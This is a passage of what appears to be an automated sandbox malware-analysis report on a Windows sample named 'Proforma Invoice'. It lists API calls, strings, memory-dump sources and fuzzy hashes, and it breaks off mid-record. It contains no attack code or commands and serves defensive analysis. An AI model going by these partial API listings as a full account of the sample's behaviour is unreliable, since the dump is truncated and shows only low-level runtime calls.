                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                • String ID: @
                                                                                                • API String ID: 4150878124-2766056989
                                                                                                • Opcode ID: 03009f9618b1564c4423d90880c228bba500410bfb53c348c247aacc51ed9610
                                                                                                • Instruction ID: 25a3cfcf7bb2d9e0d3e60b8fb4afaea8698e50e9c2dcf200f3f5fda4fa860574
                                                                                                • Opcode Fuzzy Hash: 03009f9618b1564c4423d90880c228bba500410bfb53c348c247aacc51ed9610
                                                                                                • Instruction Fuzzy Hash: 3641307690011CEFDB10DFA4CC85EEEBBB8EB05300F144159FA55B7291DA756E45CBA0
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0072F910,00000000,?,?,?,?), ref: 007279DF
                                                                                                • GetWindowLongW.USER32 ref: 007279FC
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00727A0C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long
                                                                                                • String ID: SysTreeView32
                                                                                                • API String ID: 847901565-1698111956
                                                                                                • Opcode ID: 8b36ac0bb1a39ed817d675394f8fb82059d91113913ceedb858483d43e1b3133
                                                                                                • Instruction ID: 89d174b02b68b314628141d4cbdd89d603135d201d22c8c71c48753fd9936a36
                                                                                                • Opcode Fuzzy Hash: 8b36ac0bb1a39ed817d675394f8fb82059d91113913ceedb858483d43e1b3133
                                                                                                • Instruction Fuzzy Hash: E231C071204616ABDB159E38DC45BEA77A9FB05334F208729F8B5A21E0D738ED91CB50
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00727461
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00727475
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00727499
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window
                                                                                                • String ID: SysMonthCal32
                                                                                                • API String ID: 2326795674-1439706946
                                                                                                • Opcode ID: 9c72b973f5b146f06a08ebab83f560a1ba0a14c438f564da2d7f12555800bd40
                                                                                                • Instruction ID: 1d91123da434cfa1d181ba244fc482b73df8a81e184d95f41e6721dcf1f6be8d
                                                                                                • Opcode Fuzzy Hash: 9c72b973f5b146f06a08ebab83f560a1ba0a14c438f564da2d7f12555800bd40
                                                                                                • Instruction Fuzzy Hash: 0C21F332500228ABDF159F94DC46FEA3B79EF48724F110214FE156B1D0DAB9AC51CBA0
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00727C4A
                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00727C58
                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00727C5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                • String ID: msctls_updown32
                                                                                                • API String ID: 4014797782-2298589950
                                                                                                • Opcode ID: f5e992ae9a71bf2202a4ff40633e5ff751eea4c060ba91ee8fb822dfeadac876
                                                                                                • Instruction ID: 24b68280b0ff7490332eb1f8e2262a736972f73b3a3f272eadbd64002a4870cf
                                                                                                • Opcode Fuzzy Hash: f5e992ae9a71bf2202a4ff40633e5ff751eea4c060ba91ee8fb822dfeadac876
                                                                                                • Instruction Fuzzy Hash: EB2189B1604219AFDB11DF28ECC1CA637ADEF4A354B104019FA019B3A1CB75EC51CAA0
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00726D3B
                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00726D4B
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00726D70
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                • String ID: Listbox
                                                                                                • API String ID: 3315199576-2633736733
                                                                                                • Opcode ID: e13d06568c1131a1fd0b22960641f8fae5e37e4cf39e64177d0fa72450244d31
                                                                                                • Instruction ID: 8589c70f722b8ee30fefe59fd7a59addc83b60f8bc269f422b0f2d10d7bbe40f
                                                                                                • Opcode Fuzzy Hash: e13d06568c1131a1fd0b22960641f8fae5e37e4cf39e64177d0fa72450244d31
                                                                                                • Instruction Fuzzy Hash: DF21A432700128BFDF119F54EC45FBB3BBAEF89750F018129FA459B1A0C675AC519BA0
                                                                                                APIs
                                                                                                • __snwprintf.LIBCMT ref: 00713A66
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __snwprintf_memmove
                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d$%s
                                                                                                • API String ID: 3506404897-429644846
                                                                                                • Opcode ID: 9204d2a81cdd917d42e180f7fb4dfebc19f179acae79b3b6df302b601c3dd284
                                                                                                • Instruction ID: 51c7c8852b8de83d899901f9dac08d3801fa35d5f431f1d1baaa3b72953690c5
                                                                                                • Opcode Fuzzy Hash: 9204d2a81cdd917d42e180f7fb4dfebc19f179acae79b3b6df302b601c3dd284
                                                                                                • Instruction Fuzzy Hash: 6921AE70600218AFCF50EF68CC82AEE77B6AF45710F404458F905BB182DA38EA45CB69
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00727772
                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00727787
                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00727794
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: msctls_trackbar32
                                                                                                • API String ID: 3850602802-1010561917
                                                                                                • Opcode ID: a1699eed3fe14f135b42e2f0ac8ec37e14006d7e91e5ce1703baacba8ba13aa7
                                                                                                • Instruction ID: 25cacbef9c092bb51e7bc2c686854f927f0ff66b11b0b7797943ff2a018752e1
                                                                                                • Opcode Fuzzy Hash: a1699eed3fe14f135b42e2f0ac8ec37e14006d7e91e5ce1703baacba8ba13aa7
                                                                                                • Instruction Fuzzy Hash: 5D113672200208BFEF245F71DC05FEB77A9EF89B54F01412CFA41A6190C276E811CB20
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __calloc_crt
                                                                                                • String ID: u$@Bv
                                                                                                • API String ID: 3494438863-1538309562
                                                                                                • Opcode ID: 06e9916c9dd15b689070d298c7af8e8a256cc61c17542185ff58cc7d3ab55056
                                                                                                • Instruction ID: d9362e36c73ae94cce25d5ca2a552fe265701bb1119dbddca2603aca7f256403
                                                                                                • Opcode Fuzzy Hash: 06e9916c9dd15b689070d298c7af8e8a256cc61c17542185ff58cc7d3ab55056
                                                                                                • Instruction Fuzzy Hash: F2F081B12047129EE7649F14FC61FB62796F714320F10402EF506CE290EBA88C45969C
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 006C9B94
                                                                                                  • Part of subcall function 006C9C0B: __mtinitlocknum.LIBCMT ref: 006C9C1D
                                                                                                  • Part of subcall function 006C9C0B: EnterCriticalSection.KERNEL32(00000000,?,006C9A7C,0000000D), ref: 006C9C36
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 006C9BA4
                                                                                                  • Part of subcall function 006C9100: ___addlocaleref.LIBCMT ref: 006C911C
                                                                                                  • Part of subcall function 006C9100: ___removelocaleref.LIBCMT ref: 006C9127
                                                                                                  • Part of subcall function 006C9100: ___freetlocinfo.LIBCMT ref: 006C913B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                • String ID: 8u$8u
                                                                                                • API String ID: 547918592-1741649821
                                                                                                • Opcode ID: ed1145297555db71435b9544f83ad0abbb5872334f0e28faa8fa715ce462e781
                                                                                                • Instruction ID: 9d138640752835f2839c6de3eb96c4ea9dd2f6e39fe5031a77dbe791b108ae2a
                                                                                                • Opcode Fuzzy Hash: ed1145297555db71435b9544f83ad0abbb5872334f0e28faa8fa715ce462e781
                                                                                                • Instruction Fuzzy Hash: EAE026F1843308F9E7A4B7A4280BFAD2661DB04723F20115DF000120C1CDF80A00812F
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,006A4B83,?), ref: 006A4C44
                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006A4C56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                • API String ID: 2574300362-1355242751
                                                                                                • Opcode ID: f25408e7bd4e4b5df566c32763d8fbd3040fb1229988ad10f5ee297d068b9b24
                                                                                                • Instruction ID: c52fa9573a8c36a4af172bb84b9ca560477f1219cbe5e181da44404ee4f980b6
                                                                                                • Opcode Fuzzy Hash: f25408e7bd4e4b5df566c32763d8fbd3040fb1229988ad10f5ee297d068b9b24
                                                                                                • Instruction Fuzzy Hash: F0D05B70551713CFD7305F31DD0864677F6AF05751B51C83DD496D6260EBB8D890CA51
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,006A4BD0,?,006A4DEF,?,007652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 006A4C11
                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006A4C23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                • API String ID: 2574300362-3689287502
                                                                                                • Opcode ID: 6ce987bd4b289202b0b822699254bdb72eefbd7edb2b76e2d3c1f5dd41a00153
                                                                                                • Instruction ID: 5f6a6858d604edb6acdd6a43721750a56c9f61a402f1ecd37ce909dbdaccd15b
                                                                                                • Opcode Fuzzy Hash: 6ce987bd4b289202b0b822699254bdb72eefbd7edb2b76e2d3c1f5dd41a00153
                                                                                                • Instruction Fuzzy Hash: 88D08C70501712CFC7206B70D908246B6E6AF09352B00C839D486C2250EAB8D880CA10
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00721039), ref: 00720DF5
                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00720E07
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                • API String ID: 2574300362-4033151799
                                                                                                • Opcode ID: 5235bf1fc32d3ba97bedc50805b52e5fc7cc02bf7b04840ba117378ec6267c4c
                                                                                                • Instruction ID: 4c99401d7b1b7a6cf9d930b2ae385b8c6a23a2190d9bf45566107c69e76cfdd5
                                                                                                • Opcode Fuzzy Hash: 5235bf1fc32d3ba97bedc50805b52e5fc7cc02bf7b04840ba117378ec6267c4c
                                                                                                • Instruction Fuzzy Hash: 85D0C270800326CFC3205F70D808282B2E5AF04342F01CC3DD982D2190E6BCD8F0C654
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00718CF4,?,0072F910), ref: 007190EE
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00719100
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                • API String ID: 2574300362-199464113
                                                                                                • Opcode ID: 7866e7b18624b7c6d092c795f8ba7ab71afcc8e068b032c009b760c5c670926b
                                                                                                • Instruction ID: 0eb14d2fa6d68090451670a071fe02576268cb298be53645d8aef21f8b1ca8ed
                                                                                                • Opcode Fuzzy Hash: 7866e7b18624b7c6d092c795f8ba7ab71afcc8e068b032c009b760c5c670926b
                                                                                                • Instruction Fuzzy Hash: CBD0C270510717DFC7208F34D81824272E6AF04341B15C839D481D2190E678C4C1C650
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LocalTime__swprintf
                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                • API String ID: 2070861257-2409531811
                                                                                                • Opcode ID: 151a2e11466eaf0df38bd54d7aeb614270faac38851ad8d7eff8862b8a1c1521
                                                                                                • Instruction ID: 83b3118adb6c9058a883890c84b222952cc8149c72f0e9eb82092ba7eb0ab571
                                                                                                • Opcode Fuzzy Hash: 151a2e11466eaf0df38bd54d7aeb614270faac38851ad8d7eff8862b8a1c1521
                                                                                                • Instruction Fuzzy Hash: 99D01271806358EBCF549B929888CFD777DF70A712F101462F50296180E2358B96FA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 78559966edc19441c1a052b4e247fddf3c4f3f905e390a736aa791316e5b4286
                                                                                                • Instruction ID: d42f86a115fe3c53fdc81dafb35d30493fc52ebd1a92bf11645ac2f46a67adb8
                                                                                                • Opcode Fuzzy Hash: 78559966edc19441c1a052b4e247fddf3c4f3f905e390a736aa791316e5b4286
                                                                                                • Instruction Fuzzy Hash: 61C12B75A0421AEFCB14CFA8C884EAEBBF6FF48714B158598E905DB251D730ED81DB90
                                                                                                APIs
                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0071E0BE
                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0071E101
                                                                                                  • Part of subcall function 0071D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0071D7C5
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0071E301
                                                                                                • _memmove.LIBCMT ref: 0071E314
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 3659485706-0
                                                                                                • Opcode ID: 1de11ecae9b43373b1dd321d6b2548cbba5791e46200919329742a31c5201aac
                                                                                                • Instruction ID: 9703d90507ac52530a1e8dc9cd31352f5cf7728abc34a75d2bb48bf7dfe80975
                                                                                                • Opcode Fuzzy Hash: 1de11ecae9b43373b1dd321d6b2548cbba5791e46200919329742a31c5201aac
                                                                                                • Instruction Fuzzy Hash: 44C136716043019FC754DF28C480A6ABBE5FF89714F14896EF8999B391D734E946CF81
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 007180C3
                                                                                                • CoUninitialize.OLE32 ref: 007180CE
                                                                                                  • Part of subcall function 006FD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006FD5D4
                                                                                                • VariantInit.OLEAUT32(?), ref: 007180D9
                                                                                                • VariantClear.OLEAUT32(?), ref: 007183AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 780911581-0
                                                                                                • Opcode ID: 4400d805f5b8d26bf36ab488cb596138cb8016942531938f2b70cb2fa0f7bf2c
                                                                                                • Instruction ID: 405cb6513b10238f227ba6c9adaf01109a58b6f41435bfa31f53a354f18c0887
